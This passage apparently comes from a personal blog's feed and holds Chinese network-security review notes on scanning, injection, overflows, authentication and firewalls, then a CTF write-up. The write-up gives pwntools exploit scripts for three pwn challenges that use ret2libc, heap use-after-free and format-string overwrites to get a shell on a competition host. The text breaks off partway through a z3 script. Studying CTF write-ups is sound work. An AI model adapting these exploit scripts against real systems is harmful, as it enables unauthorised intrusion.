<content type="html"><![CDATA[<h1 id="网络安全复习"><a href="#网络安全复习" class="headerlink" title="网络安全复习"></a>网络安全复习</h1><a id="more"></a><h2 id="第一章-概论"><a href="#第一章-概论" class="headerlink" title="第一章 概论"></a>第一章 概论</h2><p>网络安全主要威胁</p><p>特洛伊木马,黑客攻击,后门,计算机病毒,拒绝服务攻击,内外部泄密,蠕虫,逻辑炸弹,信息丢失篡改销毁。</p><p>网络安全的三个基本属性 C I A (扩展5个)</p><p>机密性,完整性,可用性,可认证与可信任性,不可抵赖性,可说明性,可审计性,隐私性</p><p>黑客攻击类型:从安全属性上分类:阻断攻击,截取攻击,篡改攻击,重放攻击,伪造攻击。从攻击方式分类:主动攻击:伪装,回答,修改报文,拒绝服务。</p><p>被动攻击:报文内容泄露,通信分析。</p><h2 id="第二章-网络攻击流程"><a href="#第二章-网络攻击流程" class="headerlink" title="第二章 网络攻击流程"></a>第二章 网络攻击流程</h2><h3 id="黑客攻击流程"><a href="#黑客攻击流程" class="headerlink" title="黑客攻击流程"></a>黑客攻击流程</h3><p>踩点 —> 扫描 —> 查点 —> 访问/拒绝服务 —> 提权 —> 窃取信息 —> 淹没踪迹 —> 创建后门</p><h3 id="扫描基本步骤"><a href="#扫描基本步骤" class="headerlink" title="扫描基本步骤"></a>扫描基本步骤</h3><p>确定目标系统是否真实存在,确定目标系统上那些服务正在运行或监听,探查操作系统。</p><h3 id="nmap使用技巧"><a href="#nmap使用技巧" class="headerlink" title="nmap使用技巧"></a>nmap使用技巧</h3><p>常用命令:</p><p>-sP :进行ping扫描<br>-sn: Ping Scan - disable port scan #ping探测扫描主机, 不进行端口扫描 (测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态)<br>-sA (发送tcp的ack包进行探测,可以探测主机是否存活)<br>SYN扫描(半开) -sS :向目标端送SYN数据包,返回SYN/ACK数据包,可以断定该端口处于监听状态,返回RST/ACK数据包,通常表明该端口不在监听状态,然后,扫描者送出一个RST/ACK数据包(使通信双方永远不会建立一条完整连接)优点:更隐秘,目标系统一般不会将其记入日志。缺点:半开连接过多时,会形成一种拒绝服务条件而引起对方的警觉<br>TCP连接扫描 -sT:3次握手方式tcp的扫描 #效率低,速度慢,不需要root 很容易被目标系统察觉<br>-sU:udp端口的扫描 #如果返回ICMP不可达的错误消息,说明端口是关闭的,如果得到正确的适当的回应,说明端口是开放的.udp端口扫描速度比较慢<br>FIN扫描(秘密扫描) -sF:也是tcp的扫描一种,发送一个FIN标志的数据包 如果目标端口关闭,目标系统应该返回一个RST数据包,<br>否则丢弃该包。通常只对UNIX系统的TCP/IP栈有效(Window平台总是返回RST包)。由于不包含TCP三次握手协议的任何部分,所以无法被记录下来,从而比SYN扫描隐蔽FIN数据包能通过监测SYN包的包过滤器(秘密扫描)<br>-sX:圣诞树扫描-sN:空(NULL)扫描-sV:版本检测<br>TCP ACK扫描(nmap -sA):测试防火墙的规则集。判断防火墙是简单的包过滤防火墙;还是高级的、具备数据包过滤功能的状态(stateful) 防火墙不能用来确定端口是否开放或者关闭<br>TCP窗口扫描(nmap -sW) :测试特定目标系统(如AIX和FreeBSD系统).上的端口是否开放、 被过滤一会导致目标系统返回不同的TCP窗口长度值<br>TCP Ma imon扫描(nmap -sM) : 探测报文改为FIN/ACK外,其原理与TCP FIN扫描一-样;无论端口是否开放,都应响应RST报文。Uriel注意到如果端口开放,许多基于BSD的系统只是丢弃该报文<br>UDP扫描(nmap -sU) : 向目标端口发出UDP数据包<br>如果返回“ICMP port unreachable”出错消息,表明端口关闭。如果没有收到该消息,端口可能开放remark: UDP不要求必须建立一条连接,所以扫描的准确性取决于与目标网络的使用情况和过滤机制有关的许多因素(扫描结果不可靠)</p><h3 id="查点"><a href="#查点" class="headerlink" title="查点"></a>查点</h3><p>对识别出来的服务进行更为充分的探查</p><p>· 用户账号名(用于随后的口令猜测攻击)</p><p>· 错误配置的共享资源(如不安全的文件共享)</p><p>· 具有已知安全性漏洞的旧版本软件(如存在远程缓冲区溢出的web服务器)</p><h3 id="攻击实施"><a href="#攻击实施" class="headerlink" title="攻击实施"></a>攻击实施</h3><p><strong>分类</strong>:破坏性攻击:利用工具发动攻击。入侵性攻击:利用收集到的信息,找到其系统漏洞,然后利用漏洞获取尽可能高的权限</p><p><strong>主要阶段</strong>:预攻击探测:为进一步入侵提供有用信息。口令破解与提升权限。实施攻击:缓冲区溢出、拒绝服务、后门、木马、病毒</p><p><strong>攻击善后</strong>:留后门:长时间地保留和巩固对系统的控制权。隐藏踪迹:删除日志文件,更改日志文件,替换系统程序。</p><h3 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>渗透测试</h3><p>一种通过模拟的攻击者的技术与方法,挫败目标系统的安全控制措施 并取得访问控制权的安全测试方法</p><p><strong>分类</strong>:</p><p>白盒测试:拥有组织机构的内部知识的情况下进行的渗透测试</p><p>灰盒测试:拥有一部分内部知识的情况下进行的渗透测试</p><p>黑盒测试:模拟一个对组织机构一无所知的攻击者进行的渗透测试</p><p><strong>步骤(七步)</strong></p><p>前期交互阶段:确定渗透测试范围,目标,限制条件以及服务合同细节。<br>情报搜集阶段:获取目标网络拓扑,系统配置,安全防御措施等信息。<br>威胁建模阶段:针对获取的信息进行威胁建模和攻击规划。<br>漏洞分析阶段:总和汇总的情报信息,从漏扫结果,服务查点信息等找出可实施攻击的点。<br>渗透攻击阶段:利用找出的漏洞入侵系统,获取访问权限。<br>后渗透攻击阶段:根据目标组织经营模式,保护资产形式等自主设计攻击目标。实施能造成重要业务影响的攻击<br>报告阶段:凝聚所有阶段的关键情报信息,发现的系统漏洞,成功的渗透攻击过程,同时分析修补与升级方案</p><h2 id="第四章-口令破解"><a href="#第四章-口令破解" class="headerlink" title="第四章 口令破解"></a>第四章 口令破解</h2><p>暴力破解:穷举,速度慢。</p><p>字典攻击:根据用户信息建立起一个用户可能使用的口令表文件,速度快。</p><p>组合攻击:在字典列表的基础上增加几个字母或数字进行攻击。</p><p>社会工程学:偷窥,网络嗅探,搜索垃圾箱,重放。</p><h3 id="windows口令文件"><a href="#windows口令文件" class="headerlink" title="windows口令文件"></a>windows口令文件</h3><p>1.安全账户管理器SAM机制。</p><p>C:\Windows\System32\Config\SAM</p><p>2.SAM文件:</p><p>含有本地系统或坐在控制域上所有用户名和口令的HASH值。</p><h3 id="密码系统:"><a href="#密码系统:" class="headerlink" title="密码系统:"></a>密码系统:</h3><p>/etc/passwd: 包含了用户名、用户的真实姓名、标 识信息以及每个用户的基本信息,各个域之间用”:” 隔开<br>/etc/shadow: 影子密码文件,包含了加密过的密码以 及密码失效时间</p><p>/etc/group:列出了计算机上所有的组<br>/etc/gshadow:计算机上所有组的群组影子密码文件</p><h2 id="第五章-欺骗攻击"><a href="#第五章-欺骗攻击" class="headerlink" title="第五章 欺骗攻击"></a>第五章 欺骗攻击</h2><p> 欺骗:冒充身份通过认证以骗取信任的攻击方式攻击者针对认证机制的缺陷,将自己伪装成可信任方, 从而与受害者交流,以获取信息或者展开进一步攻击</p><p>常见的欺骗攻击ip欺骗ARP欺骗邮箱欺骗DNS欺骗WEB欺骗</p><p>IP欺骗 IP协议:非面向连接,两台计算机的信任连接主要依 靠双方的IP地址</p><p><strong>IP欺骗的方式</strong>:</p><p>简单的IP地址更改:攻击者将一台计算机的IP地址修改为其它主机的地址, 以伪装冒充其它机器<br>源路由攻击:保证数据包始终会经 过一条经定的途径,而攻击者机器在该途径中<br>TCP会话劫持:接管现存动过程,即攻击者可以替代原来的合法用户,同时监视并掌 握会话内容</p><p>TCP会话劫持(Session Hijack): 接管现存动态会话的过程,即攻击者可以替代原来的合法用户,同时监视并掌握会话内容。会话劫持结合了嗅探及欺骗技术,会话劫持一般伴随着拒绝服务DoS,且不依赖于操作系统</p><p>1.发现攻击目标 ①目标是一个准予TCP 会话连接(例如Telnet和FTP等)的服务器②能否检测数据流2.确认动态会话3.猜测序列号 ①通过嗅探或者ARP欺骗,先发现目标机正在使用 的序列号,再根据序列号机制,可以猜测出下一 对SEQ/ACK序列号② 同时,攻击者若以某种方法扰乱客户主机的SEQ/ACK,服务器将不再相信客户主机正确的数据包,从而可以伪装为客户主机,使用正确的 SEQ/ACK序列号,现在攻击主机就可以与服务器进 行连接,这样就抢劫一个会话连接。4.使客户主机下线 对其进行拒绝服务攻击5.接管会话 ①持续向服务器发送数据包并且接管整个会话 ②创立账户留下后门</p><p><strong>TCP会话劫持的危害</strong></p><p> 1.就其实现原理而言,任何使用Internet进行通信 的主机都有可能受到这种攻击</p><p> 2产生了简单适用的会话劫持攻击软件,技术门槛的 降低导致了很多“少年攻击者”的诞生.</p><p>原因:一个最主要的原因就是它并不依赖于操作系统,另一个原因就是它可以被用来进行积极的攻击,通过攻击行为可以获得进入系统的可能。</p><h2 id="第六章-web攻击"><a href="#第六章-web攻击" class="headerlink" title="第六章 web攻击"></a>第六章 web攻击</h2><h3 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h3><p><strong>1.原理</strong></p><p>利用Web应用对后数据库查询语句处理存在的安全漏洞,攻击者提交一段精心构造的数据库查询代码, 根据返回的结果,获得他想得知的数据。</p><p><strong>2.注入分类</strong>普通注入:利用union查询等来进行注入。报错注入:根据报错信息进行注入。盲注:bool盲注,时间盲注。</p><p><strong>3.注入位置</strong>只要执行了了数据库查询语句的地方都可能存在注入。</p><p><strong>4.sql注入防范</strong>①使用预编译语句,绑定变量②对用户提交的数据和输入参数进行严格的过滤③摒弃动态 SQL 语句,改用存储过程来访问和操作数据④使用安全函数⑤最小权限原则</p><h3 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h3><p>攻击者往Web页面里插入恶意html代码,当用户浏览该网页时, 嵌入其中的恶意代码被执行,达到特殊目的。一旦得手,黑客可以盗取用户帐户,修改用户设置,盗取 /污染cookie,做虚假广告,查看主机信息等。</p><p><strong>1.跨站脚本攻击发起条件</strong></p><p>Web服务器允许用户在表格或编辑框中输入不相关的字符。</p><p>Web服务器存储并允许把用户输入显示在返回给终端用户的页面上,而没有去除非法字符或者重新进行编码。</p><p><strong>2.攻击实现条件</strong></p><p>需要存在跨站脚本漏洞的web应用程序</p><p>需要用户点击连接或者访问某一页面</p><p><strong>3.分类</strong>反射型XSS(XSS Reflection,非持久性的XSS):简单的将用户输入数据“反射”给浏览器,黑客需要诱导用户点击一个恶意链接。存储式XSS(Stored XSS):攻击脚本永久存储在目标服务器数据库或者文件中,比如黑客写下一篇含有恶意JavaScript代码的博客文章。DOM型XSS:利用 DOM(文档解析功能)发动攻击。</p><p><strong>4.防御</strong>用户:教育为主</p><p>Web应用开发者</p><p> 对所有用户提交内容进行可靠的输入验证。</p><p> 保护所有敏感的功能,以防被机器人自动执行或者被第三方网站所执行。</p><h3 id="web攻击防御"><a href="#web攻击防御" class="headerlink" title="web攻击防御"></a>web攻击防御</h3><p><strong>1.简单性</strong>:主机系统越简单,其安全性就越好。最好把不必要的服 务从服务器上卸载掉。</p><p><strong>2.超级用户权限</strong>:尽量不用超级用户来维护系统。</p><p><strong>3.本地和远程访问控制</strong>:访问控制是用来指定哪些用户可以访问系统的特定数据、 目录或功能。应该实现一套有效的身份验证机制,并包含用户的日志记录。</p><p><strong>4.审计和可审计性</strong>:主要指平时对记录进行审计,在系统生成的大量审计记录 中查找可疑数据,查找攻击者或恶意程序的踪迹.</p><p><strong>5.恢复</strong>:配置实时或增量备份策略是非常必要的,在紧急关头可以使得服务器的关键数据得以保存,从而可以迅速恢复服务以减少损失,同时便于事后取证的进行,以追查入侵者。</p><h2 id="第七章-缓冲区溢出"><a href="#第七章-缓冲区溢出" class="headerlink" title="第七章 缓冲区溢出"></a>第七章 缓冲区溢出</h2><p><strong>什么是缓冲区:</strong> 包含相同数据类型实例的一个连续的计算机内存块, 是程序运行期间在内存中分配的一个连续区域,用于保存包括字符数组在内的各种数据类型。</p><p><strong>缓冲区溢出(Buffer Overflow)</strong>:向固定长度的缓冲区中写入超出其预定长度的内容,造成缓冲区数据溢出,从而覆盖缓冲区周围的内存空间。</p><p>堆和栈的区别:<br>分配和管理方式不同 堆:动态分配,其空间的分配和释放都由程序员控制 栈:由编译器自动管理<br>产生碎片不同 堆:频繁的new()/delete()或malloc()/free()势必会造成内存空间的不连续,造成大量碎片,使程序效率降低 栈:先进后出的队列,永远不可能有一个内存块从栈中间弹出<br>生长方向不同 堆:向着内存地址增加的方向增长 栈:向着内存地址减小的方向增长,由内存的高地址向低地址方向增长</p><p><strong><em>黑客借此精心构造填充数据,可以修改内存中变量的 值,导致原有流程改变,甚至可以劫持进程,执行恶意代码,最终获取系统控制权\</em></strong>。</p><p><strong>其他攻击类型相比,缓冲区溢出攻击</strong>:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">技术性强</span><br><span class="line">破坏力大</span><br><span class="line">隐蔽性强</span><br></pre></td></tr></table></figure></div><h3 id="缓冲区溢出原理"><a href="#缓冲区溢出原理" class="headerlink" title="缓冲区溢出原理"></a>缓冲区溢出原理</h3><p>栈溢出 PE文件代码段中包含的机器码会装入内存的代码区<br>(.text)。发生函数调用时,函数的调用关系等信息会动态保存<br>到内存的栈区。如果需要动态分配内存,则在内存的堆区分配合适的<br>区域</p><p>堆溢出 C使用malloc()/free(),C++使用new()/delete()函数实<br>现内存的动态分配和回收</p><p>BSS溢出 .bss段存放全局和静态的未初始化变量,其分<br>配比较简单,变量之间连续存放 如下定义的两个字符数组位于BSS段:<br>static char buf1[16],buf2[16];向buf2中写入16个字符A后再往buf1中写入24个.B,由于变量连续存放,buf1溢出后,就会覆盖buf2的值 利用:改写BSS中的指针或函数指针等,改变程序原先的执行流程,使指针跳转到特定的内存地址并执行指定操作</p><p>格式化串溢出 在输出函数对输出格式进行解析时产生的漏洞</p><p>整数溢出 当计算结果超过了规定的长度后,编译器一般会删除溢出的高位部分 </p><h3 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h3><p>缓冲区溢出的真正原因在于编程语言缺乏类型安全,程序缺少边界检查。</p><p>1.系统管理上的防范策略</p><p>1.1关闭不需要的特权程序</p><p>1.2及时给程序漏洞打补丁</p><p>2.软件开发过程中的防范策略</p><p>2.1编写正确的代码</p><p>2.2数组边界检查</p><p>2.3改进语言函数库</p><p>2.4程序指针完整性检查</p><p>2.5栈保护机制</p><p>3.软件运行过程中的防范措施</p><p>3.1缓冲区不可执行</p><p>3.2地址空间随机化</p><p><strong>源码级保护方法</strong></p><p><strong>运行期保护方法</strong></p><p><strong>阻止攻击代码执行</strong></p><p><strong>加强系统防护</strong></p><h2 id="第十章-身份认证"><a href="#第十章-身份认证" class="headerlink" title="第十章 身份认证"></a>第十章 身份认证</h2><p><strong>1.AAA机制</strong>:认证 :在做任何动作之前必须要识别动作执行者的真实身份。又称为鉴别、确认。主要是通过标识符鉴别用户身份,防止攻击者假冒合法用户获取访问权限。授权 :当用户身份被确认合法后,赋予该用户进行文件和数据等的操作权限,包括读、写、执行及从属权等。审计(Auditing) :每一一个人都应该为自己所做的操作负责所以在做完事情之后都要留下记录,以便核查责任</p><p><strong>2.认证分类</strong></p><p>基于口令认证:简单口令认证,基于单向函数的口令认证,一次性口令认证。<br>基于生理特征的认证。<br>基于地址的认证:每个主机存储着可以访问本机的其他主机的账号信息,这样只要确认了对方的主机地址,就可以进行用户验证。</p><p>3.常见身份认证技术</p><p>基于口令的认证 基于密码学认证 基于令牌的认证 基于生物特征的认证</p><p><strong>3.Kerberos认证协议</strong></p><p>基于可信第三方(Trusted Third Party,TTP)的认证协议;MIT的雅典娜项目组(Athena Group)开发的认证服务系统,基于对称加密技术。</p><p>基本思想(假设):能正确对信息进行解密的用 户就是合法用户</p><p>三个子协议:</p><ol><li>认证服务器交换(AS交换):在客户C和AS间进行</li><li>票证授予服务器交换(TGS交换):在C和TGS间交换</li><li>客服服务器认证应用交换(AP交换):在C和应用服务器S间进行</li></ol><p>构成 : 一个完整的 Kerberos 环境包括一个 Kerberos 服务器,一组工作站和一组应用服务器。</p><h2 id="第十一章-访问控制"><a href="#第十一章-访问控制" class="headerlink" title="第十一章 访问控制"></a>第十一章 访问控制</h2><p>访问控制(Access Control)在身份认证的基础上,依据授权对提出的资源访问请求加以控制。对机密性、完整性起直接作用;是针对越权使用资源的防御措施</p><p>访问控制策略模型:自主访问控制:指一个实体可以被授权按照自己<br>的意志使另一个实体能够访问某些资源 强制型访问控制:通过比较具有安全许可的安全标记来控制访问 基于角色的访问控制:基于用户在系统中所属的角色和针对各种角色设定的访问权限来控制访问 基于属性的访问控制:基于用户,被访问资源以及当前环境条件控制访问。</p><p>访问控制机制包括:访问控制列表ACL,能力表,锁与钥匙,保护环</p><p>计算机安全形式化模型:机密性安全策略Bell-L aPadula模型,完整性安全策略Biba模型</p><h2 id="第十二章-防火墙"><a href="#第十二章-防火墙" class="headerlink" title="第十二章 防火墙"></a>第十二章 防火墙</h2><h3 id="基本原理"><a href="#基本原理" class="headerlink" title="基本原理"></a>基本原理</h3><p>1.防火墙是位于两个网络间的实施网间访问控制的组件的集合,防火墙通常是单独的计算机、路由器或专有硬件设备, 充当访问网络的唯一入口点。</p><p>内网和外网的所有网络数据流必 须经过防火墙.<br>只有符合安全策略的数据流才能通过防火墙.<br>防火墙自身对渗透(penetration) 是免疫的.</p><p><strong>2.处理方式</strong></p><p>ACCEPT:允许数据包或信息通过</p><p>Reject:拒绝数据包或信息通过,并且通知信息源该信息被进制</p><p>Drop:直接将数据包或信息丢弃,不通知信息源</p><p><strong>3.基本策略</strong>默认允许原则:没有明确禁止的都是允许的。默认拒绝原则:没有明确允许的都是禁止的</p><p><strong>4.主要功能</strong>网络安全的屏障。强化网络安全策略。对网络存取和访问进行监控审计。防止内部信息的外泄</p><h3 id="防火墙的分类"><a href="#防火墙的分类" class="headerlink" title="防火墙的分类"></a>防火墙的分类</h3><p>1.<strong>包过滤防火墙</strong></p><p>工作在网络层和传输层。设定访问控制列表ACL(Access Control List),检查所有通 过的数据包。</p><p>发展:静态包过滤防火墙,动态包过滤防火墙(状态检测)。</p><p>优点:<br>逻辑简单,价格便宜,对网络性能的影响较小,有较强的透明性。<br>与应用层无关。<br>缺点:<br>需要对IP、TCP、UDP等协议有深入了解,否则容易出现因配置不当而带来问题。<br>过滤有限,不能充分满足各种安全要求。<br>不能彻底防止地址欺骗。</p><p><strong>2.代理服务器</strong></p><p>应用层代理/代理服务器通过在主机上运行代理服务程 序,直接对特定的应用层进行服务,因此也称应用型防火墙。</p><p>优点:<br>1.易于配置,界面友好。<br>2.不允许内外网主机的直接链接。<br>3.提供详细日志。<br>4.可以隐藏用户内部的IP,可以给单个用户授权<br>缺点:<br>1.速度相对慢。<br>2.需要为不同的网络服务建立专门的代理服务。</p><p><strong>3.电路级网关</strong></p><p>监控受信任的客户或服务器与不受信任的主机间的TCP握手信息,以决定会话是否合法。</p><p>网络地址转换(NAT):属接入广域网技术,一种将私有IP地址转化为合法广域网IP地址的转换技术,被广泛应用。</p><p>NAT分类:静态NAT,动态NAT,端口转换NAPT。</p><p><strong>4.混合型防火墙</strong></p><h3 id="防火墙的配置方案"><a href="#防火墙的配置方案" class="headerlink" title="防火墙的配置方案"></a>防火墙的配置方案</h3><p><strong>1.屏蔽路由器</strong>:最简单的防火墙配置,直接在内网和 外网之间加装一个包过滤路由器或者应用网关</p><p><strong>2.双宿主机模式</strong>:采用主机替代路由器执行安全控制功能, 类似于包过滤防火墙,是外部网络用户进入内部网络的唯一通道。</p><p>特点:主机的路由功能被禁止,两个网络间的通信通过双宿主机完成。</p><p>弱点:一但堡垒机被攻破,可任意访问内网。</p><p><strong>3.屏蔽主机模式</strong>:包过滤路由器连接外网,堡垒主机安装在内网。</p><p><strong>4.屏蔽子网模式</strong>:较流行的一种结构,采用两个包过滤路由器和一个堡垒主机,在内外网络之间建立一个被隔离的子网,称为DMZ</p><p>协商协议的参数<br>交换公共密钥<br>对双方进行认证<br>在交换后对密钥进行管理</p>]]></content>
<summary type="html">
<h1 id="网络安全复习"><a href="#网络安全复习" class="headerlink" title="网络安全复习"></a>网络安全复习</h1>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>岁末赛</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/27/%E5%B2%81%E6%9C%AB%E8%B5%9B/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/27/%E5%B2%81%E6%9C%AB%E8%B5%9B/</id>
<published>2020-12-26T16:02:38.471Z</published>
<updated>2021-01-05T11:35:24.840Z</updated>
<content type="html"><![CDATA[<h2 id="岁末赛"><a href="#岁末赛" class="headerlink" title="岁末赛"></a>岁末赛</h2><a id="more"></a><h3 id="pwn2"><a href="#pwn2" class="headerlink" title="pwn2"></a>pwn2</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment"># from LibcSearcher import *</span></span><br><span class="line">i=remote(<span class="string">'219.219.61.234'</span>,<span class="number">10001</span>)</span><br><span class="line"><span class="comment">#sh=process('./pwn2')</span></span><br><span class="line">elf=ELF(<span class="string">'./pwn2'</span>)</span><br><span class="line">addr=<span class="number">0x08048753</span></span><br><span class="line">sm=elf.got[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">p_t=elf.plt[<span class="string">'puts'</span>]</span><br><span class="line"></span><br><span class="line">payload1=<span class="string">'\x00'</span>*<span class="number">7</span> +<span class="string">'\xff'</span></span><br><span class="line">i.sendline(payload1)</span><br><span class="line">i.recvuntil(<span class="string">"you_really_know_random_haha\n"</span>)</span><br><span class="line"></span><br><span class="line">payload2=(<span class="number">0x6c</span>+<span class="number">4</span>)*<span class="string">'a'</span>+p32(p_t)+p32(addr)+p32(sm)</span><br><span class="line">i.sendline(payload2)</span><br><span class="line">s_addr=u32(i.recv(<span class="number">4</span>))</span><br><span class="line">info(hex(s_addr))</span><br><span class="line"><span class="comment"># libc=LibcSearcher("__libc_start_main",s_addr)</span></span><br><span class="line">libc = ELF(<span class="string">'libc6-i386_2.23-0ubuntu11.2_amd64.so'</span>)</span><br><span class="line">A=s_addr-libc.sym[<span class="string">"__libc_start_main"</span>]</span><br><span class="line">info(hex(A))</span><br><span class="line">y_addr=A+libc.sym[<span class="string">'system'</span>]</span><br><span class="line"><span class="comment"># binsh_addr=A+libc.dump('str_bin_sh')</span></span><br><span class="line">binsh_addr = A + <span class="number">0x15910b</span></span><br><span class="line"><span class="comment">#payload1='\x00'*7+'\xff'</span></span><br><span class="line"><span class="comment">#i.sendline(payload1)</span></span><br><span class="line"><span class="comment">#i.recvuntil("you_really_know_random_haha")</span></span><br><span class="line">payload2=(<span class="number">0x6c</span>+<span class="number">4</span>)*<span class="string">'a'</span>+p32(y_addr)+p32(addr)+p32(binsh_addr)</span><br><span class="line">i.sendline(payload2)</span><br><span class="line">i.interactive()</span><br></pre></td></tr></table></figure></div><h3 id="pwn3"><a href="#pwn3" class="headerlink" title="pwn3"></a>pwn3</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#sh = process("./pwn3")</span></span><br><span class="line">sh = remote(<span class="string">'219.219.61.234'</span>,<span class="string">'10002'</span>)</span><br><span class="line">context.log_level = <span class="string">'info'</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create</span><span class="params">(size,content)</span>:</span></span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(<span class="string">"1"</span>)</span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(str(size))</span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(str(content))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(index)</span>:</span></span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(<span class="string">"2"</span>)</span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(str(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">myprint</span><span class="params">(index)</span>:</span></span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(<span class="string">"3"</span>)</span><br><span class="line"> sh.recv()</span><br><span class="line"> sh.sendline(str(index))</span><br><span class="line"></span><br><span class="line">create(<span class="number">8</span>,<span class="number">12</span> * <span class="string">'a'</span>)</span><br><span class="line">create(<span class="number">16</span>,<span class="string">"bbb"</span>)</span><br><span class="line">delete(<span class="string">"0"</span>)</span><br><span class="line">delete(<span class="string">"1 "</span>)</span><br><span class="line"></span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">"1"</span>)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">"8"</span>)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(p32(<span class="number">0x08048986</span>))</span><br><span class="line">myprint(<span class="string">"0"</span>)</span><br><span class="line"><span class="comment">#log.success(sh.recv())</span></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure></div><h3 id="pwn4"><a href="#pwn4" class="headerlink" title="pwn4"></a>pwn4</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = process(<span class="string">'./pwn4'</span>)</span><br><span class="line">sh = remote(<span class="string">'219.219.61.234'</span>,<span class="string">'10003'</span>)</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context(arch=<span class="string">'amd64'</span>,os=<span class="string">'linux'</span>)</span><br><span class="line">libc = ELF(<span class="string">'libc-2.23.so'</span>)</span><br><span class="line">elf = ELF(<span class="string">'./pwn4'</span>)</span><br><span class="line">puts_got = elf.got[<span class="string">'printf'</span>]</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">'a'</span>)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">'3'</span>)</span><br><span class="line">key = <span class="string">'3xpL0r3R'</span></span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(str(key))</span><br><span class="line">payload = <span class="string">'aaaa%77$p'</span><span class="comment">#6</span></span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.recvuntil(<span class="string">'aaaa0x'</span>)</span><br><span class="line">libc_base = int(int(sh.recv(<span class="number">12</span>),<span class="number">16</span>) - <span class="number">0x20840</span>)</span><br><span class="line">log.success(hex(libc_base))</span><br><span class="line"><span class="comment">#gdb.attach(sh)</span></span><br><span class="line">puts_addr = libc_base + libc.sym[<span class="string">'puts'</span>]</span><br><span class="line">log.success(hex(puts_addr))</span><br><span class="line">gad_get = [<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf0364</span>,<span class="number">0xf1207</span>]</span><br><span class="line">one_addr = libc_base + gad_get[<span class="number">0</span>]</span><br><span class="line">log.success(hex(one_addr))</span><br><span class="line"><span class="comment">#gdb.attach(sh)</span></span><br><span class="line">payload = fmtstr_payload(<span class="number">6</span>, {puts_got:one_addr})</span><br><span class="line"></span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure></div><h3 id="zzzz3333333"><a href="#zzzz3333333" class="headerlink" title="zzzz3333333"></a>zzzz3333333</h3><p>z3</p><p>不知道为啥我的z3模块出了问题,最后用sympy跑出来的</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> z3 <span class="keyword">import</span> *</span><br><span class="line">a1=Int(<span class="string">'a1'</span>)</span><br><span class="line">a1[<span class="number">1</span>]=Int(<span class="string">'a1[1]'</span>)</span><br><span class="line">a1[<span class="number">2</span>]=Int(<span class="string">'a1[2]'</span>)</span><br><span class="line">a1[<span class="number">3</span>]=Int(<span class="string">'a1[3]'</span>)</span><br><span class="line">a1[<span class="number">4</span>]=Int(<span class="string">'a1[4]'</span>)</span><br><span class="line">a1[<span class="number">5</span>]=Int(<span class="string">'a1[5]'</span>)</span><br><span class="line">a1[<span class="number">6</span>]=Int(<span class="string">'a1[6]'</span>)</span><br><span class="line">a1[<span class="number">7</span>]=Int(<span class="string">'a1[7]'</span>)</span><br><span class="line">a1[<span class="number">8</span>]=Int(<span class="string">'a1[8]'</span>)</span><br><span class="line">a1[<span class="number">9</span>]=Int(<span class="string">'a1[9]'</span>)</span><br><span class="line">a1[<span class="number">10</span>]=Int(<span class="string">'a1[10]'</span>)</span><br><span class="line">a1[<span class="number">11</span>]=Int(<span class="string">'a1[11]'</span>)</span><br><span class="line">a1[<span class="number">12</span>]=Int(<span class="string">'a1[12]'</span>)</span><br><span class="line">a1[<span class="number">13</span>]=Int(<span class="string">'a1[13]'</span>)</span><br><span class="line">a1[<span class="number">14</span>]=Int(<span class="string">'a1[14]'</span>)</span><br><span class="line">a1[<span class="number">15</span>]=Int(<span 